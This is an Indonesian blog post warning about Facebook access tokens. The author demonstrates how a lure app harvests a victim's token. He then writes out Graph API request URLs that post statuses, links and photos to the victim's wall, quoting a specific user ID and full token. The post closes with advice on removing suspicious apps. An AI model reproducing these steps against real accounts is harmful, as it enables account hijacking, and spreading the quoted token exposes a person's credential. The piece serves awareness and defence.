Sebenarnya Yang Berbahaya Bukan Aplikasinya tetai akses tokennya itu.
apa itu akses token,,
berikut penjelasannya
Apa itu Access Token ?
Access Token merupakan struktur data yang berisi informasi keamanan yang
dibutuhkan oleh sebuah proses untuk mengakses objek (dalam hal ini akun
Facebook) atau proses lainnya yang membutuhkan otorisasi.
Dari mana Access Token tercipta ?
Seperti yang kita ketahui bersama, Facebook memiliki ribuan bahkan
mungkin jutaan apps (aplikasi) untuk memanjakan penggunanya. Dari setiap
penggunaan apps tersebutlah Access Token tercipta. Setiap Access Token
akan tersimpan pada server hostingan pembuat aplikasi Facebook.
Kenapa dikatakan Access Token berbahaya ?
Apabila Access Token akun Facebook anda diketahui oleh orang yang tidak
bertanggung jawab maka orang tersebut dapat meng-update-kan status
Facebook anda, mem-posting link dan dapat pula memasukkan foto/gambar
tanpa perlu melakukan login ke akun Facebook anda. Mungkin diantara kita
pernah mendengar beberapa kasus pengguna Facebook berurusan dengan
pihak Kepolisian bahkan sampai ke depan meja hijau akibat dari status
Facebook-nya.
Bagaimana proses kerjanya ?
Di sini saya akan mempraktekkan proses kerjanya, bukan mengajarkan. Dan
di akhir penjelasan nanti akan dijelaskan bagaimana cara untuk
menghindarinya. Baiklah, mari kita mulai.
Pertama – tama saya akan login ke akun Facebook saya sendiri. Antara akun Facebook saya dengan Facebook korban tidak saling berteman. (jika berteman lebih baik lagi)
Sebelumnya, saya telah membuat sebuah aplikasi sederhana di Facebook.
Dengan memanfaatkan tekhnik social engineering saya memberikan link
aplikasi Facebook itu kepada korban agar tergiur untuk menggunakannya.
Link aplikasinya adalah http://apps.facebook.com/via_apa_saja/ (Aplikasi
Update Status Facebook Via Apa Saja)
Untuk lebih memastikan apakah korban sudah menggunakan aplikasi Facebook
dari saya, langsung saja saya login ke cpanel lalu menuju ke
phpMyAdmin.
Dan ternyata si korban telah menggunakan aplikasi Facebook dari saya.
Yang ditandai kotak warna merah adalah access_token Facebook korban.
Mari kita coba untuk meng-update-kan status Facebook korban dengan sedikit “injeksi url”
Injeksi url :
https://graph.facebook.com/ID-FACEBOOK/feed?method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN
Menjadi :
https://graph.facebook.com/100003351962048/feed?method=POST&message=Test
update status online :lol: Jahatnya Aplikasi
Facebook&access_token=AAAAAFZCpw1X4BAPe5UDJrP9AE10x6rz1lS7ElbRIHe37ZBPneJC8jJx5tRPcN6bDV9JW3EJCDwnJGcNz1VoTVsoPBhGcTCMLDpUvebAQZDZD
Untuk melihat hasilnya silakan Anda klik "injeksi url" di atas lalu buka wall profil Facebook korban
Selanjutnya kita coba untuk mem-posting LINK ke akun Facebook korban.
Injeksi url :
https://graph.facebook.com/ID/feed?method=POST&link=URL&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN
Menjadi :
https://graph.facebook.com/100003351962048/feed?method=POST&link=http://mc4-inspirasi.blogspot.com/&message=TestpostingLINK&access_token=AAAAAFZCpw1X4BAPe5UDJrP9AE10x6rz1lS7ElbRIHe37ZBPneJC8jJx5tRPcN6bDV9JW3EJCDwnJGcNz1VoTVsoPBhGcTCMLDpUvebAQZDZD
Terakhir, saya akan memasukkan sebuah gambar ke dalam akun Facebook korban.
Injeksi url :
https://graph.facebook.com/photos?url=URL GAMBAR&method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN
Menjadi :
https://graph.facebook.com/photos?url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJjdD8BByqJfP7Sn-B0YyT3bhMnXTpdgiBR06dJ4thTu10smhZaWtEwe7zRvfn6Szah-PqnIm8FpdEn8lsbFv-VIbXQzARFNodimauMgVr8y-8G1URsiJijKecqbsLJ0SwnQx9WUp__zQ/s1600/s1s.jpg&method=POST&message=APLIKASI
FACEBOOK
JAHAT&access_token=AAAAAFZCpw1X4BAPe5UDJrP9AE10x6rz1lS7ElbRIHe37ZBPneJC8jJx5tRPcN6bDV9JW3EJCDwnJGcNz1VoTVsoPBhGcTCMLDpUvebAQZDZD
Bagaimana cara menghindari penggunaan Access Token oleh orang yang tidak
bertanggung jawab ?Cara untuk menghindarinya cukup mudah yaitu :
Masuk ke Pengaturan Privasi Aplikasi Facebook
Cari aplikasi Facebook yang mencurigakan, contoh pada demo kali ini
aplikasinya bernama ACCESS_TOKEN, klik edit (sunting) pada aplikasi
tersebut.
Di sini ada beberapa pilihan, perhatikan gambar di bawah ini
ket :
merah : menghapus aplikasi dari akun Facebook Anda (direkomendasikan)
biru : menghapus akses aplikasi yang tidak Anda inginkan (pilihan)
hijau : mengatur siapa saja yang dapat melihat posting-an dari aplikasi, pilih "Only Me" (pilihan)
Akhir kata, jangan sembarang menggunakan aplikasi Facebook. Gunakan aplikasi Facebook hanya dari
sumber yang terpercaya. Sekian dan terima kasih, lebih dan kurangnya mohon dimaafkan.
Referensi :
http://id.wikipedia.org/wiki/OAuth
http://id.wikipedia.org/wiki/Access_token
https://developers.facebook.com/docs/reference/api/post/
sumber : http://blog.cyber4rt.com/2012/05/bahaya-access-token-terhadap-facebook.html
Home » news in fb » Bahaya Aplikasi Facebook Terhadap Akun Facebook Kita
Posting Komentar - Back to Content